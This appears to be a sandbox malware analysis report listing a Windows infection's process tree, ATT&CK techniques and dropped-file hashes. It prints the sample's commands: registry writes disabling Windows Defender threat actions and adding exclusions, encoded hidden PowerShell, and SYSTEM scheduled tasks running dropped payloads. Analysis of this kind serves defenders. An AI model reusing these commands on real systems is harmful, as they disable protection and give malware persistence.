C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:5420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:5572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5624
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GoZliZaJcUpmPvyPwRR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GoZliZaJcUpmPvyPwRR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IMvaoGacGFPU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IMvaoGacGFPU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KworwGpsU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KworwGpsU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PiTBaswTmLRnC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PiTBaswTmLRnC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fqZXELUDteUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fqZXELUDteUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\iWQNoaadPPPbqzVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\iWQNoaadPPPbqzVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\hcQaQMdhBGCZLFXRy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\hcQaQMdhBGCZLFXRy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IFhjgRBUvFUNtHQy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IFhjgRBUvFUNtHQy\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Modifies data under HKEY_USERS
PID:1824 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GoZliZaJcUpmPvyPwRR" /t REG_DWORD /d 0 /reg:323⤵PID:5524
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GoZliZaJcUpmPvyPwRR" /t REG_DWORD /d 0 /reg:324⤵PID:6056
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GoZliZaJcUpmPvyPwRR" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IMvaoGacGFPU2" /t REG_DWORD /d 0 /reg:323⤵PID:6064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IMvaoGacGFPU2" /t REG_DWORD /d 0 /reg:643⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KworwGpsU" /t REG_DWORD /d 0 /reg:323⤵PID:1016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KworwGpsU" /t REG_DWORD /d 0 /reg:643⤵PID:5308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PiTBaswTmLRnC" /t REG_DWORD /d 0 /reg:323⤵PID:5344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PiTBaswTmLRnC" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fqZXELUDteUn" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:5280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fqZXELUDteUn" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\iWQNoaadPPPbqzVB /t REG_DWORD /d 0 /reg:323⤵PID:5328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\iWQNoaadPPPbqzVB /t REG_DWORD /d 0 /reg:643⤵PID:5428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:5424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\hcQaQMdhBGCZLFXRy /t REG_DWORD /d 0 /reg:323⤵PID:5568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\hcQaQMdhBGCZLFXRy /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IFhjgRBUvFUNtHQy /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:5552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IFhjgRBUvFUNtHQy /t REG_DWORD /d 0 /reg:643⤵PID:3124
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjuRBXkes" /SC once /ST 01:13:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjuRBXkes"2⤵PID:5996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjuRBXkes"2⤵PID:2792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ECzxLUloJBwCJADCK" /SC once /ST 07:14:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IFhjgRBUvFUNtHQy\CKxyDMbPqQgFFAi\VMfZdiW.exe\" Wx /mYojdidzw 385121 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ECzxLUloJBwCJADCK"2⤵
- System Location Discovery: System Language Discovery
PID:3548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 10602⤵
- Program crash
PID:1340
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4956
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:3300 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5980
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:6008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5252
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4756
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
PID:1212 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:1824
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- System Location Discovery: System Language Discovery
PID:4140
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:3652
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:5860
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:4888
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3256 -
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:5556
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:5536
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:5996
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- System Location Discovery: System Language Discovery
PID:4684
-
-
C:\Windows\SysWOW64\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- System Location Discovery: System Language Discovery
PID:5900
-
-
C:\Windows\Temp\IFhjgRBUvFUNtHQy\CKxyDMbPqQgFFAi\VMfZdiW.exeC:\Windows\Temp\IFhjgRBUvFUNtHQy\CKxyDMbPqQgFFAi\VMfZdiW.exe Wx /mYojdidzw 385121 /S1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5756 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:3628
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:728 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:4240
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:3948
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4564 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:3312
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1464
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:5216 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:4212
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2656
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:2360 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:5744
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:3420
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
PID:4948 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- System Location Discovery: System Language Discovery
PID:5888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:4708 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:3600
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bMRcrYTbxyvtsWXpEp"2⤵PID:5200
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:5352
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
- Indirect Command Execution
PID:5444 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:5968
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
PID:5928
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KworwGpsU\wUzxXa.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MffudHGbAqrriNn" /V1 /F2⤵
- Scheduled Task/Job: Scheduled Task
PID:5368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5128 -ip 51281⤵PID:5648
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
PID:4184
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indirect Command Execution
1Modify Registry
3Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.6MB
MD59c8e57d2cf31e5b53e47e2296b349520
SHA1d90bb48df21b0a9a41180037d31fdda2b0f11615
SHA256a32b99cc7c89d4e14a1baa038f841fbd76acd7c0c33bc9f24f1de487de3111c8
SHA5127a8480612815c4141d27525249d000053c3ac40a74d17d326899d7bf63abb26a6d6ae641a3314e4459ab177d629fbc4629753b40a26fc761337de25cef28a4de
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
649B
MD5919a44fd3cb2232fcb693952e7c28bb2
SHA1612902b1065735136c3202c55ce5cc5d956e8206
SHA25622fdc9df6d366652cb1dccc50dac8db10ac64f3e92234633e1f78539129d2f04
SHA5127c0c7e2de0a4375e44ee29d8fc39686a0e9c84532468572f27efc4aea99b53142be252cfc4c4846f835d1cc2dded4536fd3e1a8d5e0d2e67f22792ed3896c9ba
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
523B
MD5b36490e3f5405d6c80de05247e897ae3
SHA14ffaf79c9ee1b9f132c45bc8363751d78dc47a10
SHA256bb8c524f88593f8ba2124962d487cede4ec21a7e40cb6d6ba70178b1f3c86ee4
SHA5125aed9057f2f9a192b405bef9697a79ff00de96cfab72cd763167a03c00730d6f6fef3d248e50c494422d6a754fb75ddcfd2d6dee35682593adca7a72b22098ee
-
Filesize
523B
MD5cb57394841c329691fee538dd6718e8d
SHA15ddace489a624532eaca47cfbb908921498c0afc
SHA2567505dfb22fc880b08c365383858a80d74458d9e00439d98f6c2dac9f6df3bfd0
SHA5121db0ec25da09de0be3b992cde9776cef0a953fca5563528d4688e92b19be2ae87be30f8ac786f12a2819446d5cb4f9d84b8173770a8e4d25693440521b674248
-
Filesize
523B
MD53f244980e75c839beb14c8ad280c9fbc
SHA16b0f4df57a56930407f687b5e18d6d000d808116
SHA256acf8b263d4ff16f24a0835e2907dfc0a1ae7405845d3873b25e05106e6310caf
